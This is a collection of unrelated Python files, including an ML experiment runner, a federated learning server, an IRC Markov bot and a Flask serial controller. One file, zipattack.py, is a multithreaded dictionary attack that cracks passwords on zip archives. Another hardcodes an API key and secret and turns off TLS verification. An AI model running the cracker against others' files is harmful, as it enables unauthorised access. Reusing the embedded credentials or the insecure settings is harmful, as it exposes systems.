running.py
|
# Copyright 2019 The PlaNet Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Manages experiments."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import datetime
import itertools
import os
import pickle
import six
import sys
import threading
import time
import traceback
import uuid
import numpy as np
import tensorflow as tf
class StopExperiment(Exception):
pass
class WorkerConflict(Exception):
pass
class SkipRun(Exception):
pass
class Experiment(object):
"""Experiment class."""
def __init__(
self, basedir, process_fn, start_fn=None, resume_fn=None,
num_runs=None, worker_name=None, ping_every=30, resume_runs=True, single=False, planner=None, task_str=None):
"""Coordinate experiments with multiple runs processed by multiple workers.
The experiment can be iterated over to yield runs. Runs can be iterated
over to process them and obtain their numbers.
When multiple workers create an experiment with the same base directory,
they will process different runs. If a worker dies, its runs will be
continued by another worker once they become stale.
Args:
basedir: Experiment logdir serving as root of run logdirs.
process_fn: Callable yielding numbers of the run; receives log directory
and arguments returned by the start or resume function.
start_fn: Optional callable starting a run from a log directory.
resume_fn: Optional callable resuming a run from a log directory.
num_runs: Optional maximal number of runs in the experiment.
worker_name: Name of the worker. Set to a UUID if None.
ping_every: Interval for storing PING files indicating work on a run.
"""
self._basedir = basedir
self._process_fn = process_fn
self._start_fn = start_fn
self._resume_fn = resume_fn
self._num_runs = num_runs
self._worker_name = worker_name or str(uuid.uuid4())
self._ping_every = ping_every
self._ping_stale = ping_every and 2 * ping_every
self._resume_runs = resume_runs
self._single = single
self._planner = planner
self._task_str = task_str
def __iter__(self):
"""Iterate over runs that need processing.
Looks for runs with stale log directories first, and starts a new run
otherwise. It is guaranteed that no other worker is currently processing
the returned run. If no log directory is returned, this function returns
incremental numbers, but this only works in the scenario of a single
worker.
Yields:
Runs that need processing.
"""
for current_run in self._generate_run_numbers():
logdir = self._basedir and os.path.join(
self._basedir, '{:03}'.format(current_run))
path = os.path.join(logdir, 'cem_traj.npy')
# if current_run==3:
# continue
if self._planner and self._planner == 'dual1' and os.path.exists(path):
continue
try:
run = Run(
logdir, self._process_fn, self._start_fn, self._resume_fn,
self._worker_name, self._ping_every, self._ping_stale,
self._resume_runs)
yield run
except SkipRun:
continue
except StopExperiment:
print('Stopping.')
break
print('All runs completed.')
def _generate_run_numbers(self):
"""Yield run numbers in the order they should be considered.
The user of this function must check whether a run is already finished or
being worked on, and only pick up the run if that is not the case. This
function takes into account that a worker needs to wait so its own previous
job becomes stale and can be picked up again.
Yields:
Run numbers.
"""
if self._single:
return [self._num_runs]
if self._num_runs:
# Don't wait initially and see if there are runs that are already stale.
# runs = np.random.permutation(range(self._num_runs))
runs = range(self._num_runs)
for run in runs:
yield run + 1
# At the end, wait for all dead runs to become stale, and pick them up.
# This is necessary for complete runs of workers that died very recently.
if self._ping_stale:
time.sleep(self._ping_stale)
for run in runs:
yield run + 1
else:
# For infinite runs, we want to always finish started jobs first.
# Therefore, we need to wait for them to become stale in the beginning.
if self._ping_stale:
time.sleep(self._ping_stale)
for run in itertools.count():
yield run + 1
class Run(object):
def __init__(
self, logdir, process_fn, start_fn, resume_fn, worker_name,
ping_every=30, ping_stale=60, reuse_if_exists=True):
"""Represents a unit of work associated with a log directory.
This class guarantees that in a distributed setting, only one machine at a
time holds an instance of the run for a given log directory. On other
machines, instantiating this class will raise a `SkipRun` exception.
Internally, a separate thread is used to regularly store a PING file to
signal active work in this log directory. If the worker dies for some
reason, the PING file will become stale and other machines will be allowed
to take over this log directory.
Args:
logdir: Log directory representing the run.
process_fn: Callable yielding numbers of the run; receives log directory
and arguments returned by the start or resume function.
start_fn: Optional callable starting a run from a log directory.
resume_fn: Optional callable resuming a run from a log directory.
worker_name: Unique string identifier of the current worker.
ping_every: Interval for storing PING files indicating work on a run.
"""
self._logdir = os.path.expanduser(logdir)
self._process_fn = process_fn
self._worker_name = worker_name
self._ping_every = ping_every
self._ping_stale = ping_stale
self._logger = self._create_logger()
try:
if self._should_start():
self._claim()
self._logger.info('Start.')
self._init_fn = start_fn
elif reuse_if_exists and self._should_resume():
self._claim()
self._logger.info('Resume.')
self._init_fn = resume_fn
else:
raise SkipRun
except WorkerConflict:
self._logger.info('Leave to other worker.')
raise SkipRun
self._thread = None
self._running = [True]
self._thread = threading.Thread(target=self._store_ping_thread)
self._thread.daemon = True # Terminate with main thread.
self._thread.start()
def __iter__(self):
"""Iterate over the process function and finalize the log directory."""
try:
args = self._init_fn and self._init_fn(self._logdir)
if args is None:
args = ()
if not isinstance(args, tuple):
args = (args,)
for value in self._process_fn(self._logdir, *args):
if not self._running[0]:
break
yield value
self._logger.info('Done.')
self._store_done()
except WorkerConflict:
self._logger.warning('Unexpected takeover.')
raise SkipRun
except Exception as e:
exc_info = sys.exc_info()
self._handle_exception(e)
six.reraise(*exc_info)
finally:
self._running[0] = False
self._thread and self._thread.join()
def _should_start(self):
"""Determine whether a run can be started.
Returns:
Boolean whether to start the run.
"""
if not self._logdir:
return True
if tf.gfile.Exists(os.path.join(self._logdir, 'PING')):
return False
if tf.gfile.Exists(os.path.join(self._logdir, 'DONE')):
return False
return True
def _should_resume(self):
"""Determine whether the run can be resumed.
Returns:
Boolean whether to resume the run.
"""
if not self._logdir:
return False
if tf.gfile.Exists(os.path.join(self._logdir, 'DONE')):
# self._logger.debug('Already done.')
return False
if not tf.gfile.Exists(os.path.join(self._logdir, 'PING')):
# self._logger.debug('Not started yet.')
return False
last_worker, last_ping = self._read_ping()
if last_worker != self._worker_name and last_ping < self._ping_stale:
# self._logger.debug('Already in progress.')
return False
return True
def _claim(self):
"""Ensure that no other worker will pick up this run or raise an exception.
Note that usually the last worker who claims a run wins, since its name is
in the PING file after the waiting period.
Raises:
WorkerConflict: If another worker claimed this run.
"""
if not self._logdir:
return False
self._store_ping(overwrite=True)
if self._ping_every:
time.sleep(self._ping_every)
if self._read_ping()[0] != self._worker_name:
raise WorkerConflict
self._store_ping()
def _store_done(self):
"""Mark run as finished by writing a DONE file.
"""
if not self._logdir:
return
# with tf.gfile.Open(os.path.join(self._logdir, 'DONE'), 'w') as file_:
# file_.write('\n')
def _store_fail(self, message):
"""Mark run as failed by writing a FAIL file.
"""
if not self._logdir:
return
with tf.gfile.Open(os.path.join(self._logdir, 'FAIL'), 'w') as file_:
file_.write(message + '\n')
def _read_ping(self):
"""Read the duration since the last PING was written.
Returns:
Tuple of worker who wrote the last ping and duration until then.
Raises:
WorkerConflict: If file operations fail due to concurrent file access.
"""
if not tf.gfile.Exists(os.path.join(self._logdir, 'PING')):
return None, None
try:
with tf.gfile.Open(os.path.join(self._logdir, 'PING'), 'rb') as file_:
last_worker, last_ping = pickle.load(file_)
duration = (datetime.datetime.utcnow() - last_ping).total_seconds()
return last_worker, duration
except (EOFError, IOError, tf.errors.NotFoundError):
raise WorkerConflict
def _store_ping(self, overwrite=False):
"""Signal activity by writing the current timestamp to the PING file.
Args:
overwrite: Write even if the PING file lists another worker.
Raises:
WorkerConflict: If the ping has been touched by another worker in the
mean time, or if file operations fail due to concurrent file access.
"""
if not self._logdir:
return
try:
last_worker, _ = self._read_ping()
if last_worker is None:
self._logger.info("Create directory '{}'.".format(self._logdir))
tf.gfile.MakeDirs(self._logdir)
elif last_worker != self._worker_name and not overwrite:
raise WorkerConflict
# self._logger.debug('Store ping.')
with tf.gfile.Open(os.path.join(self._logdir, 'PING'), 'wb') as file_:
pickle.dump((self._worker_name, datetime.datetime.utcnow()), file_)
except (EOFError, IOError, tf.errors.NotFoundError):
raise WorkerConflict
def _store_ping_thread(self):
"""Repeatedly write the current timestamp to the PING file."""
if not self._ping_every:
return
try:
last_write = time.time()
self._store_ping()
while self._running[0]:
if time.time() >= last_write + self._ping_every:
last_write = time.time()
self._store_ping()
# Only wait short times to quickly react to abort.
time.sleep(0.01)
except WorkerConflict:
self._running[0] = False
def _handle_exception(self, exception):
"""Mark the log directory as finished and call custom fail handler."""
message = ''.join(traceback.format_exception(*sys.exc_info()))
self._logger.warning('Exception:\n{}'.format(message))
self._logger.warning('Failed.')
try:
# self._store_done()
self._store_fail(message)
except Exception:
message = ''.join(traceback.format_exception(*sys.exc_info()))
template = 'Exception in exception handler:\n{}'
self._logger.warning(template.format(message))
def _create_logger(self):
"""Create a logger that prefixes messages with the current run name."""
run_name = self._logdir and os.path.basename(self._logdir)
methods = {}
for name in 'debug info warning'.split():
# bind `name` as a default argument so each method logs at its own level
methods[name] = lambda unused_self, message, name=name: getattr(tf.logging, name)(
'Worker {} run {}: {}'.format(self._worker_name, run_name, message))
return type('PrefixedLogger', (object,), methods)()
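# --- Added illustration (not part of the original file) ---
# A minimal sketch of how Experiment and Run are meant to be used, following the
# docstrings above. `train` is a hypothetical process function: it receives the
# run's log directory (plus anything returned by start_fn/resume_fn) and yields
# numbers for that run. The function below is illustrative and never called here.
def _example_experiment(basedir='~/my_experiment'):
    def train(logdir):
        for step in range(3):
            yield step  # the "numbers of the run" mentioned in the docstrings

    experiment = Experiment(basedir, process_fn=train, num_runs=2)
    for run in experiment:      # yields runs that still need processing
        for value in run:       # iterating a Run drives process_fn and keeps the PING fresh
            print(value)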
|
server.py
|
import torch
import torch.optim as optim
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from torch.utils.data import TensorDataset, DataLoader
from torch.autograd import Variable
import pickle
import lz4.frame
import time
import random
import socket
import copy
import multiprocessing as mp
import queue as Queue
import numpy as np
import argparse
import torchvision.models as backbones
from torchvision import datasets, transforms
from dataGenerator import dataGenerator
from model import DIN,Bottom
from config import Config
import tcper
import sys
sys.path.append('../')
import Utils.loggers as logger
import Utils.utils as utils
parser = argparse.ArgumentParser(description='Base method', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
# Acceleration
parser.add_argument('--ngpu', type=int, default=1, help='0 = CPU.')
#transfer
parser.add_argument('--ip', type=str, default='0.0.0.0', help='ip of server address')
parser.add_argument('--portA', type=int, default=1883, help='TCP port of server')
parser.add_argument('--portB', type=int, default=1886, help='TCP port of server')
parser.add_argument('--hyperport', type=int, default=1884, help='TCP port of server for model update and sppedtest')
# random seed
parser.add_argument('--manualSeed', type=int, help='manual seed')
args = parser.parse_args()
args.use_cuda = args.ngpu>0 and torch.cuda.is_available()
def upload_cloud(server,Q2,E2):
while True:
head,epoch,iters,target,m,a,useQ,server_rec,client_send,send_size=server.recieve_tensor()
print(head,iters,m.shape,useQ)
if useQ==True:
#m=pickle.loads(m)
m=torch.dequantize(m)
#a=pickle.loads(a)
a=torch.dequantize(a)
Q2.put((head,epoch,iters,target,m,a,useQ,server_rec,client_send,send_size))
E2.set()
if head=='Termi':
break
time.sleep(5)
def download_cloud(server,Q3,E3,Efull):
while True:
if not Q3.empty():
a,b,c,d,e,f,g,h=Q3.get()
Efull.set()
server.send_tensor(a,b,c,d,e,f,g,h)
if a=='Termi':
break
else:
E3.wait()
time.sleep(5)
if __name__=="__main__":
seed=1
np.random.seed(1)
torch.manual_seed(1)
torch.cuda.manual_seed(1)
# parameters
config = Config()
# cuda environments
dev = torch.device(config.cuda) if torch.cuda.is_available() else torch.device('cpu')
topmodel=DIN(embeddingGroupInfo=config.embeddingGroups,
MLPInfo=config.MLPInfo,
attMLPInfo=config.AttMLPInfo,
isUseBN=config.isUseBN,
l2RegEmbedding=config.l2RegEmbedding,
dropoutRate=config.dropoutRate,
initStd=config.initStd,
device=dev)
optimizer=config.optimizer(topmodel.parameters(), lr=config.learningRate)
scheduler=config.lrSchedule(optimizer, config.decay)
print(optimizer)
lossFunc = config.lossFunc
metricFunc = config.metricFunc
serverA=tcper.Server(args.ip,args.portA)
server_start=time.time()
print(server_start)
serverA.send_tensor('begin',-1,-1,torch.tensor([-1.1]),torch.tensor([-1.1]),server_start,1,1)
serverB=tcper.Server(args.ip,args.portB)
server_start=time.time()
print(server_start)
serverB.send_tensor('begin',-1,-1,torch.tensor([-1.1]),torch.tensor([-1.1]),server_start,1,1)
#shared memory
Q2A=mp.Queue()
Q3A=mp.Queue()
E2A=mp.Event()
E3A=mp.Event()
EfullA=mp.Event()
EfullA.set()
puploadA=mp.Process(target=upload_cloud,args=(serverA,Q2A,E2A))
pdownloadA=mp.Process(target=download_cloud,args=(serverA,Q3A,E3A,EfullA))
pdownloadA.start()
puploadA.start()
Q2B=mp.Queue()
Q3B=mp.Queue()
E2B=mp.Event()
E3B=mp.Event()
EfullB=mp.Event()
EfullB.set()
puploadB=mp.Process(target=upload_cloud,args=(serverB,Q2B,E2B))
pdownloadB=mp.Process(target=download_cloud,args=(serverB,Q3B,E3B,EfullB))
pdownloadB.start()
puploadB.start()
last_epoch=-1
impressionNum = 0.0
impressAuc = 0.0
Log_all=logger.Logger('VFL_DP')
all_log=[]
epoch_all_log=[]
acc_log=[]
all_log.append(0)
epoch_all_log.append(-1)
all_log.append(time.time())
acc_log.append(0)
while True:
if (not Q2A.empty()) and (not Q2B.empty()):
#print("cloud")
head1,epoch1,i1,label,m1,a1,useQ1,server_rec1,client_send1,send_size1=Q2A.get()
head2,epoch2,i2,label,m2,a2,useQ2,server_rec2,client_send2,send_size2=Q2B.get()
head=head1
if head=='Termi':
utils.check_full(Q3A,EfullA)
Q3A.put((head,epoch1,i1,torch.tensor([-1.1]),torch.tensor([-1.1]),server_rec1,client_send1,send_size1))
E3A.set()
utils.check_full(Q3B,EfullB)
Q3B.put((head,epoch2,i2,torch.tensor([-1.1]),torch.tensor([-1.1]),server_rec2,client_send2,send_size2))
E3B.set()
break
elif head=='Valid':
if (not epoch1==epoch_all_log[-1]) and i1==0:
all_log[-1]=time.time()-all_log[-1]
topmodel.eval()
m1=m1.to(dev)
m2=m2.to(dev)
a1=a1.to(dev)
a2=a2.to(dev)
label=label.numpy()
preds = topmodel.predict(m1,m2,a1,a2)
auc = metricFunc(label, preds)
impressionNum += 1
impressAuc += auc
elif head=='EndValid':
if not epoch1==epoch_all_log[-1]:
epoch_all_log.append(epoch1)
if not epoch1==4:
all_log.append(time.time())
acc_log.append(impressAuc/impressionNum)
print("test:{}".format(impressAuc/impressionNum))
impressionNum = 0.0
impressAuc = 0.0
elif head=='Train':
topmodel.train()
label=label.to(dev)
m1=Variable(m1, requires_grad=True).to(dev)
m2=Variable(m2, requires_grad=True).to(dev)
a1=Variable(a1, requires_grad=True).to(dev)
a2=Variable(a2, requires_grad=True).to(dev)
m1.retain_grad()
m2.retain_grad()
a1.retain_grad()
a2.retain_grad()
loss=topmodel.loss(m1,m2,a1,a2,label,lossFunc)
optimizer.zero_grad()
loss.backward()
optimizer.step()
gm1=m1.grad.detach().cpu()
gm2=m2.grad.detach().cpu()
ga1=a1.grad.detach().cpu()
ga2=a2.grad.detach().cpu()
utils.check_full(Q3A,EfullA)
Q3A.put((head,epoch1,i1,gm1,ga1,server_rec1,client_send1,send_size1))
E3A.set()
utils.check_full(Q3B,EfullB)
Q3B.put((head,epoch2,i2,gm2,ga2,server_rec2,client_send2,send_size2))
E3B.set()
else:
utils.check_full(Q3A,EfullA)
Q3A.put((head,epoch1,i1,torch.tensor([-1.1]),torch.tensor([-1.1]),server_rec1,client_send1,send_size1))
E3A.set()
utils.check_full(Q3B,EfullB)
Q3B.put((head,epoch2,i2,torch.tensor([-1.1]),torch.tensor([-1.1]),server_rec2,client_send2,send_size2))
E3B.set()
else:
if Q2A.empty():
E2A.wait()
if Q2B.empty():
E2B.wait()
time.sleep(5)
items=['epoch','latency','acc']
contents=[epoch_all_log,all_log,acc_log]
Log_all.write(items,contents)
|
zipattack.py
|
# -*- coding: utf-8 -*-
# @Author: lock
# @Date: 2016-11-02 17:17:26
# @Last Modified by: lock
# @Last Modified time: 2017-05-04 00:20:23
import zipfile
import threading
import optparse
def extractFile(zFile, password):
try:
# ZipFile.extractall expects the password as bytes in Python 3
zFile.extractall(pwd=password.encode())
print("Key Found:", password)
exit()
except Exception:
print("testing password: " + password + "\n")
def main():
parser = optparse.OptionParser('usage\t -f <zipfile> -d <dictionary> or -h get help')
parser.add_option('-f', dest='zname', type='string', help='specify zip file')
parser.add_option('-d', dest='dname', type='string', help='specify dictionary file')
options, args = parser.parse_args()
if options.zname is None or options.dname is None:
print(parser.usage)
exit(0)
else:
zname = options.zname
dname = options.dname
zFile = zipfile.ZipFile(zname)
dFile = open(dname, 'r')
for line in dFile.readlines():
password = line.strip('\n')
t = threading.Thread(target=extractFile, args=(zFile, password))
t.start()
if __name__ == '__main__':
main()
|
main.py
|
import time
import logging
import chat
import imp
import traceback
import json
import re
import math
import sys
import atexit
import json
from irc.bot import ServerSpec, SingleServerIRCBot
from threading import Thread
from os.path import isfile
logging.basicConfig(filename="bot.log", level=logging.DEBUG)
idata = ""
markovIn = None
retrieve = 1
if isfile("markov.msgpack"):
markovIn = open("markov.msgpack", "rb")
allChain = chat.MarkovChain(order=9, filename='markov.msgpack')
# allChain.save(open("markov.msgpack", "wb"))
console = logging.StreamHandler()
console.setLevel(logging.INFO)
console.terminator = ""
formatter = logging.Formatter('\r%(name)-12s: %(levelname)-8s %(message)s\n$')
console.setFormatter(formatter)
logging.getLogger('').addHandler(console)
last = ""
class LonedudeBot(SingleServerIRCBot):
def __init__(self, server, port, channels, chain = None):
super().__init__([ServerSpec(server, port)], "Lonedude", "A simple Markov bot by Gustavo6046")
self.chain = chain or chat.MarkovChain()
self.joinchans = channels
def on_pubmsg(self, connection, event):
global allChain
mcommand = event.arguments[0].startswith("()markov") and ( len(event.arguments[0]) == 8 or event.arguments[0].startswith("()markov ") )
if mcommand or re.search(re.escape(connection.nickname) + '([,.:;]* |$)', event.arguments[0]) != None:
data = event.arguments[0]
res = None
mat = re.search(re.escape(connection.nickname) + '([,.:;]* |$)', event.arguments[0])
if mat != None and len(data) > len(mat.group(0)):
data = data[data.find(connection.nickname) + len(re.search(re.escape(connection.nickname) + '([,.:;]* |$)', event.arguments[0]).group(0)):]
elif data.startswith('()markov '):
data = data[9:]
else:
return
def _r():
if data is not None:
try:
last = res = self.chain.get(data, 250)
except BaseException as e:
for l in traceback.format_exc().split("\n"):
logging.error(l)
self.connection.privmsg(event.target, "[{}: {} ({})!]".format(event.source.nick, type(e).__name__, str(e)))
res = False
finally:
try:
self.chain.parse(data)
except BaseException as e:
for l in traceback.format_exc().split("\n"):
logging.warning(l)
else:
try:
last = res = self.chain.random(250)
except BaseException as e:
for l in traceback.format_exc().split("\n"):
logging.error(l)
self.connection.privmsg(event.target, "[{}: {} ({})!]".format(event.source.nick, type(e).__name__, str(e)))
res = False
if not res:
self.connection.privmsg(event.target, "[{}: No Markov data!]".format(event.source.nick))
else:
for u in self.channels[event.target].users():
if res.lower().find(str(u.lower())) > -1:
print("Stripping nickname: {}".format(repr(u.lower())))
res = res[:res.lower().find(str(u.lower()))] + res[res.lower().find(str(u.lower())) + len(u.lower()):]
res = res.strip(" ")
self.connection.privmsg(event.target, "{}: {}".format(event.source.nick, res))
global retrieve
Thread(target=_r, name="#{} Markov Retriever".format(retrieve)).start()
retrieve += 1
elif event.arguments[0] in ("()like", "()up", "()good"):
self.chain.add_score(1, last)
self.connection.privmsg(event.target, "{}: Sentence weight increased.".format(event.source.nick))
elif event.arguments[0] in ("()dislike", "()down", "()bad"):
self.chain.add_score(-1, last)
self.connection.privmsg(event.target, "{}: Sentence weight decreased.".format(event.source.nick))
elif event.arguments[0] == "()random":
res = self.chain.random(250)
for u in self.channels[event.target].users():
if res.lower().find(str(u.lower())) > -1:
print("Stripping nickname: {}".format(repr(u.lower())))
res = res[:res.lower().find(str(u.lower()))] + res[res.lower().find(str(u.lower())) + len(u.lower()):]
res = res.strip(" ")
self.connection.privmsg(event.target, "{}: {}".format(event.source.nick, res))
elif event.arguments[0] == "()reload":
try:
global chat
chat = imp.reload(chat)
self.chain = chat.MarkovChain(order=9, filename=allChain)
allChain = self.chain
except BaseException:
for l in traceback.format_exc().split("\n"):
logging.error(l)
self.connection.privmsg(event.target, "[{}: Error reloading!]".format(event.source.nick))
else:
self.connection.privmsg(event.target, "[{}: Reloaded succesfully.]".format(event.source.nick))
elif event.arguments[0] == "()size":
self.connection.privmsg(event.target, "[{}: {} forward and {} backward nodes.]".format(event.source.nick, len(self.chain.data), len(self.chain.back)))
else:
try:
self.chain.parse(event.arguments[0])
except BaseException as e:
for l in traceback.format_exc().split("\n"):
logging.error(l)
def on_endofmotd(self, connection, event):
logging.debug("Joining channel")
for c in self.joinchans:
self.connection.join(c)
def _exit_bots():
pass
if __name__ == "__main__":
def _on_exit():
_exit_bots()
allChain.save(open("markov.msgpack", "wb"))
atexit.register(_on_exit)
if len(sys.argv) > 1:
omniChar = 0
omniLines = 0
for fi, a in enumerate(sys.argv[1:]):
lines = list(filter(lambda x: len(x) > allChain.order, map(lambda x: x.lstrip('\n').split('\n')[0], open("./parsedata/{}.txt".format(a)).readlines())))
allChar = sum(map(len, lines))
omniChar += allChar
omniLines += len(lines)
charInd = 0
for i, l in enumerate(lines):
charInd += len(l)
perc = str(math.floor(100 * charInd / allChar))
prog = int(50 * charInd / allChar)
rl = "\rFile {} out of {}: {}/{} ({}{}%) [{}{}]".format(fi + 1, len(sys.argv) - 1, i + 1, len(lines), " " * (3 - len(perc)), perc, '#' * prog, ' ' * (50 - prog))
rl += " " * max(90 - len(rl), 0)
sys.stdout.write(rl)
allChain.parse(l)
print("Parsed {} characters and {} lines.".format(omniChar, omniLines))
ofp = open("markov.msgpack", "wb")
else:
conns = {}
for s in json.load(open("config.json")):
conns[s[1]] = LonedudeBot(s[0], 6667, s[2:], allChain)
Thread(target=conns[s[1]].start, name="Bot: {}".format(s[0])).start()
def _listenInput():
global idata
logging.info("*** Listening at stdin for user input now.")
while True:
c = sys.stdin.read(1)
if c != '':
idata += c
logging.info(repr(idata))
time.sleep(0.1)
else:
time.sleep(0.5)
def _nexit():
for c in conns.values():
c.disconnect("Lonedude Markov Chain Monte Carlo Engine v0.1.0")
_exit_bots = _nexit
# Thread(target=_listenInput, name="Input Thread").start()
while True:
console.setFormatter(logging.Formatter('\r%(name)-12s: %(levelname)-8s %(message)s\n${}'.format(idata)))
if idata.find('\n') < 0:
time.sleep(0.2)
continue
idata = idata.split('\n')[-1]
cmds = idata.split('\n')[:-1]
for cmd in cmds:
if ":" not in cmd:
cmd += ":"
con = cmd.split(":")[0]
cmd = cmd[len(con) + 1:]
if con not in conns:
if con == "eval":
print(cmd, '->', eval(cmd))
elif con == "clear":
allChain.data = {}
allChain.back = {}
allChain.fw_weights = {}
allChain.bw_weights = {}
allChain.save(open("markov.msgpack", "wb"))
time.sleep(0.2)
continue
if cmd != '':
print("* Sending to {}".format(con))
conns[con].connection.send_raw(cmd)
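# --- Added illustration (not part of the original file) ---
# The MarkovChain API of the `chat` module as it is used above; the module itself
# is not shown here, so treat this as an inferred sketch rather than documented
# behaviour.
#
#   chain = chat.MarkovChain(order=9)           # fresh chain (or filename=... to load)
#   chain.parse("some text to learn from")      # feed one line of training text
#   reply = chain.get("seed text", 250)         # reply seeded by the input, limit 250
#   line = chain.random(250)                    # unseeded random sentence, limit 250
#   chain.add_score(1, line)                    # up-weight a generated sentence
#   chain.save(open("markov.msgpack", "wb"))    # persist the chain to disk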
|
hilos.py
|
#!/usr/bin/env python
import threading
def worker(count):
# function that does the work in the thread
print('Showing value %s for the thread' % count)
return
threads = list()
for i in range(3):
t = threading.Thread(target=worker, args=(i,))
threads.append(t)
t.start()
|
performance_test.py
|
import requests
from profile import profile
from time import sleep
import threading
import psutil
import hashlib
API_KEY = "IAWMMTs0.cHddQPXa343hvAKcUY7FZHOyyT8Vo55h"
API_SECRET = "IAWMMTs0"
SUCCESS = 0
COUNTER = 1
@profile
def make_request(i):
global SUCCESS, COUNTER
name = "onem.img"
hash_md5 = hashlib.md5()
with open(name, "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5.update(chunk)
data = {
'ip': '192.168.1.120',
'machine': 'IronMachine',
'filename': 'Evi' + str(COUNTER),
'user': 'Avinash',
'rank': i,
'md5sum': hash_md5.hexdigest(),
'token': API_KEY
}
COUNTER += 1
files = {'pde': open(name, 'rb')}
# headers = { 'Api-Secret-Key': 'Zm4QsmdXsobX', 'Api-Token': 'f8000c5bb202edd77e994658f02949a2'} #old
headers = {'Api-Secret-Key': API_SECRET, 'Api-Token': API_KEY,
'X-Api-Key': API_KEY, 'Authorization': 'Token ' + API_KEY, 'Token': API_KEY}
# 'content-type': 'multipart/form-data',
r = requests.post("https://localhost:8000/pde/add/",
data=data, headers=headers, files=files, verify=False)
# r = requests.post("https://localhost:8000/pde/add/", data=data, headers=headers, files=files, verify=False)
print(r.text)
if "Success" in r.text:
SUCCESS += 1
def stats():
print("Success: ", SUCCESS)
def seq(c):
for i in range(c):
make_request(i)
def con(c):
for i in range(c):
threading.Thread(target=make_request, args=(i,)).start()
# con(10)
seq(10)
stats()
|
logger.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
import serial
import logging
import Queue
from threading import Thread
import json
from logging.handlers import RotatingFileHandler
from flask import Flask, render_template
input_device = None
output_devices = []
# Assign Arduino's serial comms path
comms_port = '/dev/ttyACM0'
# Flask app object used for routing and logging throughout this module
app = Flask(__name__)
# create file handler and set level to debug, with auto log rotate max size 10mb keeping 10 logs.
file_handler = RotatingFileHandler('logger.log', maxBytes=10 * 1024 * 1024, backupCount=10)
# create formatter
log_formatter = logging.Formatter("%(asctime)s - %(levelname)s - %(name)s - %(message)s")
# add formatter to our console handler
file_handler.setFormatter(log_formatter)
# example code for various logging levels
#app.logger.debug("debug message")
#app.logger.info("info message")
#app.logger.warn("warn message")
#app.logger.error("error message")
#app.logger.critical("critical message")
#app.logger.exception("exception message followed by trace")
file_handler.setLevel(logging.INFO)
app.logger.addHandler(file_handler)
class Serial_Communicator:
def __init__(self):
# Set up serial baud rate
self.serial_connection = serial.Serial (comms_port, 57600 , timeout = 1 )
self.send_queue = Queue.Queue()
self.receive_queue = Queue.Queue()
# use a running flag for out while loop
self.run = True
app.logger.debug("Serial_Communicator starting receive listner.")
self.receive_listner_instance = Thread(target=self.receive_listner)
self.receive_listner_instance.start()
app.logger.debug("Serial_Communicator starting send listner.")
self.send_listner_instance = Thread(target=self.send_listner)
self.send_listner_instance.start()
app.logger.debug("Serial_Communicator starting keepalive sentinel.")
self.keepalive_sentinel_instance = Thread(target=self.keepalive_sentinel)
self.keepalive_sentinel_instance.start()
app.logger.debug("Serial_Communicator init complete.")
def receive_listner(self):
app.logger.debug("receive_listner - listening ...")
while self.run :
read_line = None
read_line = self.serial_connection.readline()
self.receive_queue.put(read_line)
app.logger.debug("receive_listner - '%s'" % read_line)
def send_listner(self):
app.logger.debug("send_listner - listening ...")
while self.run :
if not self.send_queue.empty():
message = self.send_queue.get()
app.logger.debug("send_message - writing message : %s" % message)
self.serial_connection.write("%s\n" % message)
self.serial_connection.flush()
app.logger.debug("send_message - returned from message write.")
def keepalive_sentinel(self):
while self.run :
self.send_queue.put("KA0000")
time.sleep(1)
def send_message(self, message):
self.send_queue.put(message)
def shutdown(self):
app.logger.debug("shutdown - shutdown started ...")
app.logger.debug("shutdown - sending KI1100 message ...")
self.send_message("KI1100")
app.logger.debug("shutdown - stopping listener ...")
self.run = False
app.logger.debug("shutdown - flushing ...")
self.serial_connection.flush()
app.logger.debug("shutdown - closing ...")
self.serial_connection.close()
app.logger.debug("shutdown - returned from close.")
app.logger.debug("main - instantiating Serial_Communicator.")
serial_communicator = Serial_Communicator()
@app.route('/')
def index():
#serial_communicator.send_message("LT0100")
#serial_communicator.send_message("RT1100")
#time.sleep(5)
#serial_communicator.send_message("LT0000")
#serial_communicator.send_message("RT0000")
#time.sleep(1)
#serial_communicator.send_message("LT1100")
#serial_communicator.send_message("RT0100")
#time.sleep(5)
#serial_communicator.send_message("KI1100")
return render_template('index.html')
@app.route('/send_command/<command>')
def send_command(command):
app.logger.info("got command [%s]" % command)
# Do some basic checks to ensure command string is valid.
return_object = {'output' : None , 'error' : None, 'success' : False}
app.logger.info("Is this the first two digits ? %s" % command[0:2])
command_string = command[0:2]
try:
# Check we've been given a valid integer
int(command[2])
command_string = "%s%s" % (command_string,command[2])
except ValueError:
return_object['error'] = "Direction element of non integer value : %s" % command[2]
try:
# Check we've been given a valid integer
if int(command[3:6]) <= 255 :
command_string = "%s%s" % (command_string,command[3:6])
else:
return_object['error'] = "Power element value greater than 255 : %s" % command[3:6]
except ValueError:
return_object['error'] = "Power element of non integer value : %s" % command[3:6]
if not return_object['error']:
serial_communicator.send_message(command_string)
return_object['output'] = command_string
return_object['success'] = True
app.logger.info('sending command [%s]' % command_string)
else:
app.logger.error(return_object['error'])
return json.dumps(return_object)
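# --- Added illustration (not part of the original file) ---
# send_command() expects a six character command: two letters, one direction digit
# and a three digit power value up to 255, e.g. "LT1100" or "RT0100" as in the
# commented examples in index() above. A client could exercise the endpoint with:
#
#   import requests
#   requests.get('http://localhost:8082/send_command/LT1100')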
if __name__ == '__main__':
app.logger.debug("main - sending serial messages.")
app.run(host='0.0.0.0', port=8082, use_reloader=False)
app.logger.debug("main - sending shutdown.")
serial_communicator.shutdown()
import serial
import sys
import rt
def make_io(path,mode):
if path.startswith('file:'):
return open(path[5:], mode)
else:
return serial.Serial(path,115200,timeout=15)
ecu = make_io(sys.argv[1],'rb')
dash = make_io(sys.argv[2],'ab')
#ecu = serial.Serial(sys.argv[1],115200,timeout=15)
#dash = serial.Serial(sys.argv[2],115200,timeout=15)
#log = open(sys.argv[3], "a")
